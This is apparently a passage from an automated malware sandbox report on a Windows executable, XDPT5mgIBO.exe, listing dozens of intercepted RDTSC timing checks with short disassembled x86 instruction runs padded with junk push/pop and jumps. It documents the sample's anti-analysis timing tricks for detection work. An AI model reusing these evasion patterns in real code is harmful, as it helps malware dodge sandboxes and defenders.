Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576FC second address: A57703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A578EC second address: A57912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA3D4D82106h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B1F second address: A57B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B23 second address: A57B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B29 second address: A57B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnc 00007FA3D4C68E56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov cx, F61Bh 0x00000015 push 00000004h 0x00000017 mov di, D68Bh 0x0000001b nop 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4A second address: A57B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4E second address: A57B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A58046 second address: A5804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A581EB second address: A58205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3D4C68E61h 0x0000000f jmp 00007FA3D4C68E5Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9371D second address: A9374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA3D4D8210Ch 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FA3D4D82119h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A938F6 second address: A938FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9642A second address: A96438 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A96438 second address: A9643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9643E second address: A96442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1368A second address: A13690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13690 second address: A13694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13694 second address: A136C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4C68E56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3D4C68E64h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C4 second address: A136C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C8 second address: A136E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3D4C68E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FA3D4C68E5Ch 0x00000015 jne 00007FA3D4C68E56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9914B second address: A99150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D0 second address: A992D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D6 second address: A992DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD2D second address: A9FD33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD33 second address: A9FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD39 second address: A9FD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FE68 second address: A9FEAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jmp 00007FA3D4D82114h 0x00000015 popad 0x00000016 jne 00007FA3D4D82128h 0x0000001c push edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA3D4D82110h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0007 second address: AA0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0018 second address: AA001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0182 second address: AA0193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FA3D4C68E5Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0193 second address: AA0198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0198 second address: AA01A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02CA second address: AA02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02DA second address: AA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3D4C68E56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA288F second address: AA28B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82119h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA28B2 second address: AA28B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA667B second address: AA6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA6680 second address: AA6687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA6687 second address: AA668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA668D second address: AA669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FA3D4C68E56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C04 second address: AA5C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C08 second address: AA5C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C25 second address: AA5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5C3D second address: AA5C4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA5D95 second address: AA5D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA607A second address: AA607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA607E second address: AA60A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 jne 00007FA3D4D82106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9127 second address: AA9131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA3D4C68E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9131 second address: AA913F instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA913F second address: AA9148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA9148 second address: AA914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA914E second address: AA9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB2189 second address: AB218F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB218F second address: AB2193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0385 second address: AB038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB038B second address: AB038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0696 second address: AB069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB069C second address: AB06BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Eh 0x00000007 jmp 00007FA3D4C68E61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06BF second address: AB06CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06CF second address: AB06D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB06D5 second address: AB06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0D79 second address: AB0D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB0D7F second address: AB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA3D4D82106h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB18DC second address: AB1926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f popad 0x00000010 jmp 00007FA3D4C68E63h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA3D4C68E5Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB1926 second address: AB192E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB192E second address: AB1937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB1937 second address: AB193D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5DF8 second address: AB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5DFE second address: AB5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5A05 second address: AB5A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AB5A0B second address: AB5A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B2D second address: AC2B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA3D4C68E56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B3A second address: AC2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FA3D4D82106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B53 second address: AC2B5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2B5D second address: AC2B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC106E second address: AC1082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e jp 00007FA3D4D82106h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1507 second address: AC152E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA3D4C68E62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC152E second address: AC1550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82117h 0x00000007 pushad 0x00000008 jno 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC17E6 second address: AC1804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E67h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1804 second address: AC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D82113h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3D4D8213Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FA3D4D82106h 0x0000001c jg 00007FA3D4D82106h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1834 second address: AC1854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 jmp 00007FA3D4C68E63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC19A4 second address: AC19B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B23 second address: AC1B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B27 second address: AC1B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007FA3D4D82106h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B37 second address: AC1B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FA3D4C68E56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC1B44 second address: AC1B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007FA3D4D82112h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA3D4D82106h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC223F second address: AC2255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2255 second address: AC225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC2989 second address: AC299C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC299C second address: AC29B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC29B8 second address: AC29EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA3D4C68E63h 0x00000014 popad 0x00000015 jno 00007FA3D4C68E5Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC29EB second address: AC29F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA3D4D8210Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8AA0 second address: AC8AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8AA6 second address: AC8AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AC8BDF second address: AC8C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f jne 00007FA3D4C68E8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3D4C68E65h 0x0000001c rdtsc
